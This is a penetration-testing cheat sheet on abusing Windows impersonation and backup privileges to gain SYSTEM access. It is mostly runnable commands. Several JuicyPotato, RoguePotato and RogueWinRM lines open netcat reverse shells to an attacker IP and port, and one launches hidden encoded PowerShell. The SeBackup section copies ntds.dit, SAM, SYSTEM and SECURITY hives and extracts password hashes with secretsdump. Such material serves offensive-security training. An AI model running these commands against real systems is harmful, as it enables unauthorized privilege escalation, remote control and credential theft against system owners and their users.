Impersonation Privileges

Token impersonation is a technique through which a Windows local administrator could steal another user’s security token in order to impersonate and effectively execute commands as that user.

Full privileges cheatsheet at https://github.com/gtworek/Priv2Admin, summary below will only list direct ways to exploit the privilege to obtain an admin session or read sensitive files.

Privilege	Impact	Tool
SeAssignPrimaryToken	Admin	3rd party tool
SeImpersonate	Admin	3rd party tool
SeBackupPrivilege	Admin	3rd party tool
SeBackup	Threat	Built-in commands
SeCreateToken	Admin	3rd party tool
SeDebug	Admin	PowerShell
SeLoadDriver	Admin	3rd party tool
SeRestore	Admin	PowerShell
SeTakeOwnership	Admin	Built-in commands

1. SeImpersonate or SeAssignPrimaryToken

If the machine is < Windows 10 1809 < Windows Server 2019 - Try Juicy Potato

If the machine is >= Windows 10 1809 & Windows Server 2019 - Try Rogue Potato

- SharpImpersonate

https://github.com/juliourena/SharpImpersonate/tree/master

- SweetPotato

SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc EncBase64"

- JuicyPotato

Binary available at : https://github.com/ohpe/juicy-potato/releases

1. Check the privileges of the service account, you should look for SeImpersonate and/or SeAssignPrimaryToken (Impersonate a client after authentication)

whoami /priv

2. Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object

https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md

• Windows 7 Enterprise

• Windows 8.1 Enterprise

• Windows 10 Enterprise

• Windows 10 Professional

• Windows Server 2008 R2 Enterprise

• Windows Server 2012 Datacenter

• Windows Server 2016 Standard

3. Execute JuicyPotato to run a privileged command.

Examples:

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t *

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c nc.exe <IP> <PORT> -e c:\windows\system32\cmd.exe" -t * -c <CLSID>

JuicyPotato.exe -l 9999 -p c:\interpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}

JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337

......

[+] authresult 0

{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

• Automated Juicy Potato --> Lovely Potato (https://github.com/TsukiCTF/Lovely-Potato) (Works only until Windows Server 2016 and Windows 10 until patch 1803)

- PrintSpoofer

Works only until Windows Server 2016 and Windows 10 until patch 1803.

1. Check SeImpersonatePrivilege

2. https://github.com/itm4n/PrintSpoofer

- Rogue Potato (Fake OXID Resolver)

Binary available at https://github.com/antonioCoco/RoguePotato

1. Network redirector / port forwarder to run on your remote machine, must use port 135 as src port

sudo socat tcp-listen:135,reuseaddr,fork tcp:{Victim IP}:9999

2. RoguePotato all in one with RogueOxidResolver running locally on port 9999

RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999

RoguePotato.exe -r 10.10.10.10 -e "C:\PrivEsc\reverse.exe" -l 9999

3. RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine.

Use this if you have fw restrictions.

RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe"

4. RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename

RoguePotato.exe -r 10.0.0.3 -e "C:\windows\system32\cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode

- RogueWinRM

Binary available at https://github.com/antonioCoco/RogueWinRM

RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running (default on Win10 but NOT on Windows Server 2019).

RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe {Our IP} {PORT}"

2. SeBackup

If a user has this privileges, it means he can Dump SAM (See Windows PostExp > Credential Theft)

We can also use: https://github.com/giuliano108/SeBackupPrivilege

upload SeBackupPrivilegeUtils.dll

upload SeBackupPrivilegeCmdLets.dll

Next, import the .dll files and invoke the Copy-FileSeBackupPrivilege cmdlet on ntds.dit and system .

import-module .\SeBackupPrivilegeCmdLets.dll

import-module .\SeBackupPrivilegeUtils.dll

Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM

c:\windows\temp\SYSTEM -Overwrite

Then Download the saved files (Example with evil-winrm)

download system

download ntds

Then run secretsdump, specifying the LOCAL parameter to extract the hashes from the NTDS.dit.

secretsdump.py -ntds ntds -system system LOCAL

If this isn't a domain controller, there would be no NTDS.dit file to get passwords from, so we

would need to download the SYSTEM, SAM and SECURITY files instead:

Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM

c:\windows\temp\SYSTEM -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SECURITY

c:\windows\temp\SECURITY -Overwrite

Copy-FileSeBackupPrivilege h:\windows\system32\config\SAM c:\windows\temp\SAM -Overwrite

From these files we can extract LSA secrets, the machine account and local user hashes using

secretsdump.

secretsdump.py -security security -sam sam -system system LOCAL